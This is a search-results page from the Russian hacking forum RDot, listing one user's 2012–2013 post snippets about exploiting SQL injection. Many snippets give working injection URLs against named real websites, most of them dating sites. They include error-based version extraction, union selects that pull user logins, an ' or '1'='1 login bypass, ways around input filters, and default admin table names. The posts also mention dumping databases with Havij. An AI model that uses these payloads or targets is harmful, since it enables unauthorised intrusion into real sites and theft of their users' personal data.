Вернуться   RDot: White Hat Security Community > Поиск по форуму

Показано с 1 по 25 из 77.
На поиск затрачено 0.01 сек.
Поиск: Сообщения от: durito
Раздел: Web-среда/Web-applications 19.07.2013, 15:37
Ответов: 3,618
Просмотров: 3,302,257
Автор durito
можно что либо сделать в этом случае...

можно что либо сделать в этом случае www.**/node/660' и в какую сторону копать? с PostgreSQL особо не работал :(

Правила темы изменились, линки запрещены /Jokester.
Раздел: Web-среда/Web-applications 04.03.2013, 10:39
Ответов: 3,618
Просмотров: 3,302,257
Автор durito
oRb скорее всего :(

oRb скорее всего :(
Раздел: Web-среда/Web-applications 04.03.2013, 07:28
Ответов: 3,618
Просмотров: 3,302,257
Автор durito
вот впервые столкнулся с такой траблой используя...

вот впервые столкнулся с такой траблой используя метод 4.2 Объеденение с помощью GROUP_CONCAT
https://rdot.org/forum/showthread.php?t=124
один и тот же запрос, на одном и том же сайте в случае...
Раздел: Web-среда/Web-applications 14.02.2013, 06:33
Ответов: 3,618
Просмотров: 3,302,257
Автор durito
без разницы какие значение подставлять, сообщение...

без разницы какие значение подставлять, сообщение об ошибке все равно не выводит :(
Раздел: Web-среда/Web-applications 13.02.2013, 16:20
Ответов: 3,618
Просмотров: 3,302,257
Автор durito
Итак имеем error based: ...

Итак имеем error based:
http://www.site.cov/search.php?a[]=0)+or 1 group by concat(version(),floor(rand(0)*2)) having min(0) or 1/*

Duplicate entry '4.1.14-standard1' for key 1

Знаем таблицу и...
Раздел: Web-среда/Web-applications 06.02.2013, 19:57
Ответов: 3,618
Просмотров: 3,302,257
Автор durito
вот столкнулся с очень интересной траблой в...

вот столкнулся с очень интересной траблой в group_dumper.txt, один и тот же запрос, на одном и том же сайте в случае обращения к данным в таблицах site1.users и site2.users , в первом случае...
Раздел: Web-среда/Web-applications 19.07.2012, 16:34
Ответов: 3,618
Просмотров: 3,302,257
Автор durito
http://www.dating21.com/matrimonials/index.asp?ctr...

http://www.dating21.com/matrimonials/index.asp?ctry=Malaysia&id=149&st=Selangor&ct=Kuala%20Lumpur%27+or+1=@@version--

а вот вывести данные из любой таблицы не получается :(
Раздел: Инструментарий/Tools 01.07.2012, 10:09
Ответов: 2
Просмотров: 7,161
Автор durito
глюк в Havij при дампинге данных из Mssql

не знал куда запостить, решил сюда :)

вот столкнулся с глюком в Havij_1.15_Pro

при дампинге данных из MSSQL регулярно выводит одни и те же данные из таблицы:



я сначала думал, что в базе...
Раздел: Web-среда/Web-applications 27.06.2012, 16:20
Ответов: 3,618
Просмотров: 3,302,257
Автор durito
имеем скуль...

имеем скуль https://www.pre-dating.com/speed-dating-register/?event=22495+and 1=1+--+

имеем фильтр на связки union select, SeLEct CoLuMn_Name from information_schema.columns

смена регистра,...
Раздел: Web-среда/Web-applications 11.06.2012, 10:26
Ответов: 3,618
Просмотров: 3,302,257
Автор durito
вот столкнулся с интересной фильтрацией: ...

вот столкнулся с интересной фильтрацией:

http://www.8minutedating.com/8md/signup/inviteAFriend.cgi?EID=18571+order+by+89+--+

но вставить более 7 полей не получается, срабатывает фильтр.
...
Раздел: Web-среда/Web-applications 09.06.2012, 12:35
Ответов: 3,618
Просмотров: 3,302,257
Автор durito
Flakt, cat1vo спасибо, но меня интересовал именно...

Flakt, cat1vo спасибо, но меня интересовал именно вот этот "безнадежный" вариант с checkpostcode.php
просто было интересно, что из него можно выжать :)
Раздел: Web-среда/Web-applications 08.06.2012, 21:59
Ответов: 3,618
Просмотров: 3,302,257
Автор durito
Ereeee 5 и более символов - ошибки нет

Ereeee 5 и более символов - ошибки нет
Раздел: Web-среда/Web-applications 08.06.2012, 16:34
Ответов: 3,618
Просмотров: 3,302,257
Автор durito
судя по всему какой-то гимор с ошибкой, а не...

судя по всему какой-то гимор с ошибкой, а не скуля:

https://www.singlesolution.com/core/checkpostcode.php?postcode=100%27

имеем сообщение об ошибке с строкой запроса SELECT id FROM postcodes...
Раздел: Web-среда/Web-applications 22.05.2012, 14:06
Ответов: 3,618
Просмотров: 3,302,257
Автор durito
столкнулся с жесткой фильтрацией...

столкнулся с жесткой фильтрацией information_schema, ни смена регистра, ни обрамление комментариями не помогли.

проблема решена post-запросами. жесткая фильтрация только get :)
Раздел: Web-среда/Web-applications 04.05.2012, 21:58
Ответов: 3,618
Просмотров: 3,302,257
Автор durito
есть маленькая проблема: www.dreamdates.com...

есть маленькая проблема:

www.dreamdates.com есть скуль - в авторизации вместо пароля вводим ' or '1'='1 и логинимся (login можно оставить пустым)
ветка 4.1.12

дальше имеем скуль в инбоксе:...
Раздел: Web-среда/Web-applications 03.05.2012, 22:33
Ответов: 3,618
Просмотров: 3,302,257
Автор durito
может кому и пригодиться: SIPT 4 отлично...

может кому и пригодиться:

SIPT 4 отлично справляется с blind в PostgerSQL

и еще вопрос, простите за ламерство, с PostgerSQL никогда не имел дело, если ли аналог count(*) для PostgerSQL. в...
Раздел: Web-среда/Web-applications 03.05.2012, 10:07
Ответов: 3,618
Просмотров: 3,302,257
Автор durito
1. есть ли какое то автоматизированное средство...

1. есть ли какое то автоматизированное средство для раскрутки слепых инъекций в PostgerSQL ? в инете ничего путного и рабочего не нашел.

2. MYSQL 4.1.12 Стандартная скуль с выводом через ошибку....
Раздел: Web-среда/Web-applications 07.04.2012, 09:43
Ответов: 3,618
Просмотров: 3,302,257
Автор durito
Lostnull таблицу с юзерами нашел?

Lostnull таблицу с юзерами нашел?
Раздел: Web-среда/Web-applications 13.03.2012, 20:38
Ответов: 3,618
Просмотров: 3,302,257
Автор durito
это mssql, limit тут нет :)

это mssql, limit тут нет :)
Раздел: Web-среда/Web-applications 13.03.2012, 17:47
Ответов: 3,618
Просмотров: 3,302,257
Автор durito
еще одна гиморная скуль выносит мне мозг ...

еще одна гиморная скуль выносит мне мозг



получаем имя первой таблицы

но вот подзапросы уже не проходят:


стандартный вариант перебора таблиц и полей тоже
Раздел: Web-среда/Web-applications 11.03.2012, 13:01
Ответов: 3,618
Просмотров: 3,302,257
Автор durito
FliP Table 'eafangames.fifa' doesn't exist у...

FliP

Table 'eafangames.fifa' doesn't exist у тебя таблица fifa в другой базе находиться.

ищи свою базу
...
Раздел: Web-среда/Web-applications 11.03.2012, 12:43
Ответов: 3,618
Просмотров: 3,302,257
Автор durito
вот еще одна мозготрахательная скуль: ...

вот еще одна мозготрахательная скуль:

http://www.matrisearch.com/basicsearch.asp?page=1220&sex=@@version&startage=0&endage=99



выводит только первые 2 символа, но это не проблема

вот уже...
Раздел: Web-среда/Web-applications 11.03.2012, 09:52
Ответов: 3,618
Просмотров: 3,302,257
Автор durito
FliP ...

FliP

http://eafangames.com/live_score_tennis.php/flash_games_online.php?channel=76%27%29+union+select+login%20from%20user+limit+1,1--+f

узнаем логин, к примеру vasia, хексим его - 0x7661736961...
Раздел: Web-среда/Web-applications 11.03.2012, 09:43
Ответов: 3,618
Просмотров: 3,302,257
Автор durito
огромное спасибо Ereeee. он предложил...

огромное спасибо Ereeee. он предложил использовать curl. ему видимо пофиг на HTTP/1.1 500 Internal Server Error
Раздел: Web-среда/Web-applications 10.03.2012, 17:06
Ответов: 3,618
Просмотров: 3,302,257
Автор durito
Consistent, Ereeee так как это aeDating...

Consistent,
Ereeee

так как это aeDating версии 4 и выше то таблицы по умолчанию


`Admins`

`Name`
`Password`
Показано с 1 по 25 из 77.

 
Быстрый переход


Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2021, Jelsoft Enterprises Ltd. Перевод: zCarot